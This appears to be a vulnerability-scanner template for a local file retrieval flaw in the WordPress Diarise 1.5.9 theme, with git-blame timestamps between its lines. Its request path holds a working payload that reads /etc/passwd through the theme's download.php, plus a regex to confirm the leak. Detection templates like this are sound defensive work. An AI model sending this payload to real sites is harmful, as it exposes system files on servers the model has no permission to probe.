2021-11-01 09:07:16 +00:00
|
|
|
id: diarise-theme-lfi
|
2022-04-07 13:53:15 +00:00
|
|
|
|
2021-10-30 21:44:13 +00:00
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: WordPress Diarise 1.5.9 - Arbitrary File Retrieval
|
2021-10-30 21:44:13 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-05-13 20:26:43 +00:00
|
|
|
description: WordPress Diarise theme version 1.5.9 suffers from a local file retrieval vulnerability.
|
2021-10-30 21:44:13 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html
|
|
|
|
- https://cxsecurity.com/issue/WLB-2019050123
|
2022-04-07 13:53:15 +00:00
|
|
|
- https://woocommerce.com/?aff=1790
|
|
|
|
classification:
|
|
|
|
cwe-id: CWE-98
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: packetstorm,wordpress,wp-theme,lfi
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2021-10-30 21:44:13 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-10-30 21:44:13 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|